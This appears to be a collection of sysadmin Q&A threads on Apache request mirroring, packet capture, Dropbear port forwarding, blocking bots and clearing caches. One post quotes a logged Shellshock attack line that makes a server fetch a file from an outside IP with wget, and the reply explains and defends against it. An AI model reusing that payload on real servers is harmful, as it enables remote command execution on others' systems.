I have a busy web server running apache. Now I am interested in certain request like:
http://myserver1/path1/somepage1.html?xxxxxx
http://myserver1/path2/somepage2.html?xxxxxx
What I want to do is to duplicate request like this and forward them to another webserver like:
http://myserver2/request_statistic/
But the original request must be served on myserver1 as they are now. myserver2 is only for research purpose, so I want the duplicated request headers and bodys are just as the original ones.
Can this be done? How?
Thank you.
Where would the response go?
You might try looking at mod_security, which has a number of useful features that would be of use... is your goal security/forensics, or performance analysis?
For performance analysis, I've found it more useful in the past to create a more comprehensive logging format that captures things like response-code, response Location header (for tracking redirects), selected request headers, timing information, etc.
If https is not in use, then you might be better served by something driven by packet-capture. I know that Oracle Real User Information (?) (RUI) works using that principle. For more casual diagnostic sessions, I've often gotten away with the following tcpdump:
tcpdump -s0 -A -p -nn tcp and port 80
That's enough to get the full requests (and responses), it is a little messy, but the data is all there. You can clean it up a bit with a script, such as the following (tcpdump-http-headers-only) -- its not perfect (particularly on a busy server where things get harder to track).
#!/bin/bash
#
# Pass in the output of 'tcpdump -s0 -A ...' to this and it will
# output only the HTTP request headers and response headers.
#
# Cameron Kerr <cameron.kerr.nz#gmail.com>
# 2013-02-14
#
grep --line-buffered -o \
-e $'GET .*\r' \
-e $'POST .*\r' \
-e $'^[A-Z][A-Za-z0-9_-]*: .*\r' \
-e $'HTTP/1.1 .*\r' \
-e $'^\r$' \
| sed --unbuffered -e 's,\r$,,'
Alternatively, you might like to capture them (perhaps in conjunction with the -W, -C or -G options) for later analysis. This can, depending on the cipher used, also work with https connections if the key is provided (useful for Wireshark)
Related
I have been using openSSH for a little bit and just learned the basics of port forwarding in OpenSSH. I own some equipment that has dropbear installed on it but it seems the options are different. The equipment has an internal webpage operating on port 443 and I would like to forward that to another PC securely.
Port-forwarding requires the ssh client and ssh server to interoperate, and of course for the feature to be present and allowed in both. At build time Dropbear has 4 distinct settings for this
#define DROPBEAR_CLI_LOCALTCPFWD 1
#define DROPBEAR_CLI_REMOTETCPFWD 1
#define DROPBEAR_SVR_LOCALTCPFWD 1
#define DROPBEAR_SVR_REMOTETCPFWD 1
These are all set by default in the official (current dropbear-2022.82) source. AFAICT every public release since 2003 has had some form of TCP forwarding support (but not necessarily enabled when it was built).
Usefully, these options control both the feature itself, and whether the feature is documented in the -h help output—if the relevant options are omitted from the help output then they were omitted from the build.
With Dropbear server you should be able to run dropbear -h or (sshd -h if it has been renamed), the presence of the -j and/or -k options indicate DROPBEAR_SVR_LOCALTCPFWD and DROPBEAR_SVR_REMOTETCPFWD respectively were set at build time.
With Dropbear client you should run dbclient -h (or ssh -h), the presence of the -L and/or -R indicate DROPBEAR_CLI_LOCALTCPFWD and DROPBEAR_CLI_REMOTETCPFWD respectively were set at build time.
(If the binaries were renamed you can confirm their identity with the -V option.)
Finally, for Dropbear server it must be started without the -j or -k options to allow it to observe client requests for local and remote forwarding respectively.
If all of the above is as expected (specifically the capabilities and run-time options of the target system Dropbear ssh server) you should then be able to do something like one of:
ssh -L10443:127.0.0.1:443 dropbearhost
ssh -L10443:x.x.x.x:443 dropbearhost
where localhost:10443 (e.g. https://localhost:10443/ on the initiating system will forward to 127.0.0.1:443 on dropbearhost (or x.x.x.x:443 with an alternate IP if the web server is bound to a specific address). If SNI is enforced, then adding the virtualhost name to the hosts file on the initiating system should fix that (and might also be required if the web content uses redirects).
If you happen to be building Dropbear, you change those build options by hand after running configure:
grep TCPFWD default_options.h >> localoptions.h
and amend, setting them to 0 or 1 as required. (Note though in older versions these defines were named, set and used slightly differently.)
We have just moved our web apps to a self hosted site on digital ocean, vs our previous web host. The instance is getting hammered by rpm's according to New Relic but we are seeing very few page views. Throughput RPM's are around the 400rpm stage where as we only have about 1 page view per minute.
When i look at the access log it is getting hammered with what i am guessing is spambots, trying to access the non existant downloads folder. Its causing my CPU to run at 95%, even though nothing is actually happening.
How can i stop this spamming access??
So far i have created a downloads folder and put a Deny All in a htaccess file in it. That appeared to cool things down but now its getting worse again (hence the desperate post)
Find a pattern of malevolent requests and restrict the IP they are coming from.
Require a hashed headrt to be provided for each request to verify the identity of the person/group wanting access.
Restrict more than N downloads to any IP over M time threshold.
Distribute traffic load via DNS proxying to multiple hosts/web servers.
Switch to NGINX. NGINX is more performant than Apache in most cases with "high-levels" of requests. See Digital Ocean's article --> https://www.digitalocean.com/community/tutorials/apache-vs-nginx-practical-considerations.
Make sure your firewall employs a whitelist of hosts/ports. NOT *
I'd use tables to drop any connection from the spam bot ip address.
Find which ips are connected to your apache server:
netstat -tn 2>/dev/null | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr | head
You should get something like:
20 49.237.134.0
10 31.187.6.0
15 166.137.246.0
Once you find the bot ip addresses (probably the ones with higher number of connections), use iptables to DROP further connections:
iptables -A INPUT -s 49.237.134.0 -p tcp --destination-port 80 -j DROP
iptables -A INPUT -s 31.187.6.0 -p tcp --destination-port 80 -j DROP
iptables -A INPUT -s 166.137.246.0 -p tcp --destination-port 80 -j DROP
Note:
Make sure you're not dropping connections from search engine bots like google, yahoo, etc...
You can use www.infobyip.com to get detailed information about a specific ip address.
How can I clear apache cache in xammp?
I tried the 'htcacheclean -r' command, but it's always generated error.
If I know well the apache can't cache the files/ scripts, but a system administrator said this: 'The apache casheing the site, so clear the apache(!) cache.'.
Take a look at this:
Use mod_cache at http://httpd.apache.org/docs/2.0/mod/mod_cache.html
CacheDisable /local_files
Description: Disable caching of specified URLs Syntax: CacheDisable url-string Context: server config, virtual host
Try this if others not working:
htcacheclean -p C:\xampp\htdocs\yourproject -rv -L 1000M
In this way, you specify the -p path clearly, not to expect xampp to find that path.
The -r = Clean thoroughly. This assumes that the Apache web server is
not running. This option is mutually exclusive with the -d
option and implies -t.
The -v = Be verbose and print statistics. This option is mutually
exclusive with the -d option.
The -L 1000M = Specify LIMIT as the total disk cache inode limit.(in Megabytes)
I'm running several virtual hosts on Apache 2.2.22 and just noticed a rather alarming incident in the logs where a "security scanner" from Iceland was able to wget a file into a cgi-bin directory with the following http request line:
() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"
It effectively downloaded the file in question.
Could any one explain how this request manages to actually execute the bash command ?
Naturally, the cgi-bin shouldn't be writable, but it would still be helpful to understand how this type of exploit functions and if there isn't some way to change the Apache configuration parameters so that request commands are never executed ...
This may be unrelated, but several hours later, there has begun a stream of strange requests from the internal interface, occurring every 2 seconds:
host: ":443" request: "NICK netply" source ip: 127.0.0.1
This is a vulnerability in bash which is exposed via Apache referred to as the "Shellshock" or "bash bug" and allows an attacker to execute arbitrary commands both locally and remotely making it a very serious vulnerability.
You need to update bash, but you are showing signs of an already compromised system. For more information on shellshock including detection and fixing, see:
digitalocean.com
shellshocker.net
Currently, I'm making curl calls, check the response and some times do a "ssh HOSTNAME "tail -f LOGFILE" | grep PATTERN. Is there a tool out there that streamline/generalize this process of making some request, checking both the response and server logs for certain patterns? (Oh, and getting statistics like response time would be plus)
I've only got an answer to part of your question. To get good stats out of cURL, try something like this:
curl -w '\nLookup time:\t%{time_namelookup}\nConnect time:\t%{time_connect}\nPreXfer time:\t%{time_pretransfer}\nStartXfer time:\t%{time_starttransfer}\n\nTotal time:\t%{time_total}\n' -o /dev/null -s http://www.google.com/